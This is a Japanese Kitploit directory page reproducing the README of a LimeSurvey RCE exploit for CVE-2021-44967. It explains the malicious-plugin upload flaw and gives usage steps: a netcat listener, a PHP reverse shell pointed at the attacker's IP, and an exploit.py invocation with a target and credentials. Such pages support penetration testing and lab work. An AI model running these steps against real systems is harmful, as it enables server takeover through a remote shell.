Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
-Limesurvey-RCE-CVE-2021-44967 — 🔥 Limesurvey向け自動RCEエクスプロイト (CVE-2021-44967)。特権昇格のための最適化されたエクスプロイトチェーン。🚀 | Kitploit
ツール/GitHubGitHub/kikechans/-limesurvey-rce-cve-2021-44967
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストペイロード開発
GitHubkikechans/-limesurvey-rce-cve-2021-44967

-Limesurvey-RCE-CVE-2021-44967

🔥 Limesurvey向け自動RCEエクスプロイト (CVE-2021-44967)。特権昇格のための最適化されたエクスプロイトチェーン。🚀

リポジトリを見る
13ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🚀 LimeSurvey RCE (CVE-2021-44967) - 認証済みリモートコード実行

このリポジトリには、LimeSurvey の認証済みリモートコード実行脆弱性 CVE-2021-44967 の実用的なエクスプロイトが含まれています。

🎯 互換性

テスト済みで動作確認済み:

  • LimeSurvey 5.2.x
  • LimeSurvey 6.x

🐛 脆弱性の概要

この脆弱性により、管理者権限を持つ認証済みユーザーが悪意のあるプラグインをアップロードできます。LimeSurvey はプラグインZIPの内容を厳密に検証せず、プラグインディレクトリ内のPHPファイルの実行を防止しないため、攻撃者はアップロードしたシェルに直接アクセスすることでRCEを達成できます。

✨ 特徴

  • 🤖 自動エクスプロイト: ログイン、CSRFトークンの処理、プラグインのアップロード、インストール、アクティベーションを自動的に実行します。
  • ✅ 互換性の向上: config.xml を LimeSurvey バージョン3.0~6.0との互換性のために更新しました。
  • 💣 柔軟なペイロード: 堅牢なPHPリバースシェルが含まれています。

🛠️ 使い方

1️⃣ リスナーの準備

マシンでnetcatリスナーを起動:

root@kitploit:~
nc -lvnp 443

2️⃣ リバースシェルの設定

php-rev.php を編集して、ローカルIPとポートを設定:

root@kitploit:~
$ip = '<YOUR_IP>';
$port = 443;

3️⃣ エクスプロイトの実行

root@kitploit:~
python3 exploit.py <TARGET_URL> <USERNAME> <PASSWORD>

例:

root@kitploit:~
python3 exploit.py http://10.129.1.243/survey admin test

📁 リポジトリ構成

  • 🐍 exploit.py: メインの自動化スクリプト。
  • 🐘 php-rev.php: PHPリバースシェルペイロード。
  • ⚙️ config.xml: 必須のLimeSurveyプラグイン設定ファイル。

⚠️ 免責事項

このツールは教育目的および許可されたセキュリティテスト専用です。 厳密に管理された合法的な環境(例:CTF、ラボ環境、または許可されたエンゲージメント)での使用を意図しています。作者はこのツールの誤用や損害に対して一切責任を負いません。責任を持って、明確な許可を得たシステムでのみ使用してください。

ツールをダウンロード